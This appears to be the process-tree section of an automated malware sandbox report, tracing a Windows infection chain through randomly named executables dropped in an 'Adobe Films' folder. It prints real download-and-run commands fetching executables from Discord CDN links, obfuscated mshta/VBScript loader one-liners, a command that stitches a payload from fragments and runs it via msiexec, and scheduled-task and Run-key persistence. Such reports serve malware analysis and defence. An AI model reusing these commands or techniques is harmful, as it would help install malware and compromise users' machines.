                                                                                      "C:\Users\Admin\Pictures\Adobe Films\u3cRqTdVGtXPgh8ADvnvPDLI.exe"
                                                                                      7⤵
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:6592
                                                                                    • C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe
                                                                                      "C:\Users\Admin\Pictures\Adobe Films\PxZ8UI6mifYkoYl3a6RLFIRc.exe"
                                                                                      7⤵
                                                                                        PID:6584
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"
                                                                                        7⤵
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:6548
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\k0TXFOp3H5JxB39Nd0AgP7Fb.exe"
                                                                                          8⤵
                                                                                            PID:7396
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\mbqtmEoq2yLOhYkBnJknXxjC.exe"
                                                                                          7⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:6852
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"
                                                                                          7⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:6948
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\oB2x5G23PqGLN_dcI6m33Hqc.exe"
                                                                                            8⤵
                                                                                              PID:5048
                                                                                          • C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe
                                                                                            "C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe"
                                                                                            7⤵
                                                                                              PID:6644
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\4EE4.bat "C:\Users\Admin\Pictures\Adobe Films\2X_oqUkYKyg5tm9hJDe9JgpK.exe""
                                                                                                8⤵
                                                                                                  PID:2788
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                    9⤵
                                                                                                      PID:8140
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                      9⤵
                                                                                                        PID:1368
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                        9⤵
                                                                                                          PID:7640
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4582\18.exe
                                                                                                          18.exe
                                                                                                          9⤵
                                                                                                            PID:7980
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4582\Transmissibility.exe
                                                                                                            Transmissibility.exe
                                                                                                            9⤵
                                                                                                              PID:7916
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\4ED3.tmp\4EE3.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                              9⤵
                                                                                                                PID:4888
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\FVg5dIcYh8MQcezkMZUKRnJw.exe"
                                                                                                            7⤵
                                                                                                            • Checks whether UAC is enabled
                                                                                                            PID:6832
                                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\demimondaines.vbs"
                                                                                                              8⤵
                                                                                                                PID:7556
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq
                                                                                                                  9⤵
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:7624
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"
                                                                                                                    10⤵
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:5468
                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                      11⤵
                                                                                                                        PID:2556
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\RmAEbkxy08cLllgKYBk96wod.exe"
                                                                                                                7⤵
                                                                                                                  PID:2632
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\vRPeoOe1mIWiEt7qCOcg_mkL.exe"
                                                                                                                  7⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5608
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                    8⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Adds Run key to start application
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    PID:8052
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                      9⤵
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      PID:8304
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                                                        10⤵
                                                                                                                          PID:7700
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --mojo-platform-channel-handle=1848 /prefetch:8
                                                                                                                          10⤵
                                                                                                                            PID:2132
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,5525722587339380748,4767359402503815464,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8304_2109337628" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1780 /prefetch:2
                                                                                                                            10⤵
                                                                                                                              PID:6252
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c Mon173a360b525.exe
                                                                                                                    5⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:1960
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exe
                                                                                                                      Mon173a360b525.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5008
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\1378909358.exe"
                                                                                                                        7⤵
                                                                                                                          PID:4592
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1378909358.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1378909358.exe"
                                                                                                                            8⤵
                                                                                                                              PID:4216
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\6286259440.exe"
                                                                                                                            7⤵
                                                                                                                              PID:5928
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6286259440.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\6286259440.exe"
                                                                                                                                8⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5940
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "Mon173a360b525.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon173a360b525.exe" & exit
                                                                                                                              7⤵
                                                                                                                                PID:7320
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im "Mon173a360b525.exe" /f
                                                                                                                                  8⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:6508
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                                                                                                            5⤵
                                                                                                                              PID:2900
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon179f74c0ff3cf1f.exe
                                                                                                                                Mon179f74c0ff3cf1f.exe
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:988
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\mTeABXpBzcGCUGPGqC7x3nV1.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5156
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"
                                                                                                                                  7⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                  PID:5912
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\13DXiLTMa1hLpSFPz4hnS78R.exe"
                                                                                                                                    8⤵
                                                                                                                                      PID:7272
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\JaCAPd06FlDmrpOxihzFv2Ya.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4692
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\CXGvGSzadJsTx1qTxImyPp7A.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:6184
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\i9iBfSFpiJLNYdkx4pTJj13W.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:1372
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\W9xWu_AEnKs623Q9RYQ1dIrL.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:2928
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ejmyMi7AtBevIn8DRICZl6av.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    PID:1552
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                      8⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:6732
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                      8⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:1988
                                                                                                                                    • C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe
                                                                                                                                      "C:\Users\Admin\Documents\GnF7HaoQK81Ivyv8nyx9jPhh.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:7424
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\zMjI_8K8Q84OeL8sLmItXmSr.exe"
                                                                                                                                          9⤵
                                                                                                                                            PID:1316
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\MP3j7z4lRZhS6aiY4zSqJ4fH.exe"
                                                                                                                                            9⤵
                                                                                                                                              PID:7080
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\a1ohz7L8cj47IFCOWCtIwgDi.exe"
                                                                                                                                              9⤵
                                                                                                                                                PID:8180
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  PID:2468
                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                    taskkill /f /im chrome.exe
                                                                                                                                                    11⤵
                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                    PID:7064
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\pPg9gR09BXK6mbu2BNNejH5P.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                PID:6436
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"
                                                                                                                                                9⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:6432
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                  10⤵
                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                  PID:3056
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\wkXv2fTh4gd_QhZD3v2cNXAC.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                    11⤵
                                                                                                                                                      PID:3348
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                        12⤵
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        PID:7356
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                          13⤵
                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                          PID:2572
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                            14⤵
                                                                                                                                                              PID:7620
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                            13⤵
                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                            PID:7100
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                              14⤵
                                                                                                                                                                PID:6344
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                  15⤵
                                                                                                                                                                    PID:6848
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:5360
                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                    15⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:4216
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -f -iM "wkXv2fTh4gd_QhZD3v2cNXAC.exe"
                                                                                                                                                              12⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:2032
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\wZVnvy2IVTzCaL9M575mmBDx.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5440
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\V5QkACUZs6HpWtXhCwXQlkbI.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6120
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                            10⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:5192
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                              11⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                              PID:7424
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1e8,0x1ec,0x1f0,0x1cc,0x1f4,0x7ff877eadec0,0x7ff877eaded0,0x7ff877eadee0
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:7864
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x138,0x13c,0x140,0x114,0x144,0x7ff79e239e70,0x7ff79e239e80,0x7ff79e239e90
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:3252
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:2
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:8620
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:8728
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --mojo-platform-channel-handle=2304 /prefetch:8
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:8784
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,10941048411921159893,3482529078965718897,131072 --lang=ja --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7424_1852806505" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1756 /prefetch:1
                                                                                                                                                                          12⤵
                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                          PID:8856
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
